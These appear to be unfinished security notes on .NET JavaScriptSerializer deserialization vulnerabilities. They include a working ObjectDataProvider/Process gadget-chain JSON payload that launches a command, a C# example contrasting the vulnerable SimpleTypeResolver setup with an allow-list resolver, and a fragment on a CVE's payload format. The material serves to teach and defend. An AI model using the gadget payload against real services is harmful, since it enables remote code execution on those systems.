This is under construction
Deserializing data back into an object: sometimes things go badly wrong
JavaScriptSerializer( SimpleTypeResolver )
JavaScriptSerializer Deserialization - When the serializer is constructed with a type resolver, you can pass a JSON string whose __type fields name the classes to instantiate; the serializer creates each one and calls its property setters, and a chained gadget such as ObjectDataProvider can then invoke a method. Thus the gadget must be constructible with 0 args and expose a method that takes 0 args. Example: Process.Start(), which reads the StartInfo property (which we can supply in the JSON string).
e.g.:
{
    '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'ObjectInstance':{
        '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        'StartInfo': {
            '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
            'FileName':'cmd',
            'Arguments':'/c calc'
        }
    }
}
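The root cause above is that SimpleTypeResolver hands every __type value straight to Type.GetType(), so the input decides which class gets built and which setters run. The following C# is an added example (not from these notes or any project) showing that vulnerable construction next to two hardened forms: deserializing into a concrete type with no resolver at all, and a custom JavaScriptTypeResolver that only maps short, application-chosen ids to an explicit allow-list. It assumes .NET Framework with a reference to System.Web.Extensions.dll; UserPreferences, AllowListTypeResolver and the sample JSON strings are constructed for the example.

```csharp
using System;
using System.Collections.Generic;
using System.Web.Script.Serialization; // System.Web.Extensions.dll (.NET Framework)

// Hypothetical DTO the application legitimately expects to receive.
public class UserPreferences
{
    public string Theme { get; set; }
    public int PageSize { get; set; }
}

// Vulnerable pattern: SimpleTypeResolver resolves any assembly-qualified "__type"
// via Type.GetType(), so the JSON (not the code) chooses the class and its setters run.
public static class Vulnerable
{
    public static object Deserialize(string json)
    {
        var serializer = new JavaScriptSerializer(new SimpleTypeResolver());
        return serializer.DeserializeObject(json);
    }
}

// Hardened resolver: short ids map to an allow-list of plain data types; anything
// else (including assembly-qualified names) is rejected before instantiation.
public sealed class AllowListTypeResolver : JavaScriptTypeResolver
{
    private static readonly Dictionary<string, Type> Allowed = new Dictionary<string, Type>
    {
        { "UserPreferences", typeof(UserPreferences) },
    };

    public override Type ResolveType(string id)
    {
        if (id != null && Allowed.TryGetValue(id, out var t))
            return t;
        throw new InvalidOperationException("Type not permitted for deserialization: " + id);
    }

    public override string ResolveTypeId(Type type)
    {
        foreach (var kv in Allowed)
            if (kv.Value == type) return kv.Key;
        throw new InvalidOperationException("Type not permitted for serialization: " + type);
    }
}

public static class Hardened
{
    // Preferred: no resolver at all; __type is ignored and only UserPreferences is built.
    public static UserPreferences DeserializeTyped(string json)
    {
        return new JavaScriptSerializer().Deserialize<UserPreferences>(json);
    }

    // When polymorphic input is unavoidable: resolve only through the allow-list.
    public static object DeserializeWithAllowList(string json)
    {
        return new JavaScriptSerializer(new AllowListTypeResolver()).DeserializeObject(json);
    }
}

public static class Demo
{
    public static void Main()
    {
        // Constructed sample: benign document carrying a short, allow-listed type id.
        const string benign = "{\"__type\":\"UserPreferences\",\"Theme\":\"dark\",\"PageSize\":25}";
        var prefs = (UserPreferences)Hardened.DeserializeWithAllowList(benign);
        Console.WriteLine(prefs.Theme + " / " + prefs.PageSize);

        // Constructed sample: an assembly-qualified __type of the shape the notes describe.
        // SimpleTypeResolver would try to load it; the allow-list resolver refuses it.
        const string unexpected = "{\"__type\":\"Some.Unexpected.Type, SomeAssembly\",\"Theme\":\"x\"}";
        try { Hardened.DeserializeWithAllowList(unexpected); }
        catch (InvalidOperationException e) { Console.WriteLine("rejected: " + e.Message); }
    }
}
```

Rejecting in ResolveType rather than returning null keeps the failure explicit and easy to log; the allow-list should contain only data-holder classes whose setters have no side effects, since every setter on a resolved type still runs during deserialization.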
For this CVE, there are two payloads, each encoded and encrypted, separated by an &.
The first part is the object's properties; the second part is the assembly type.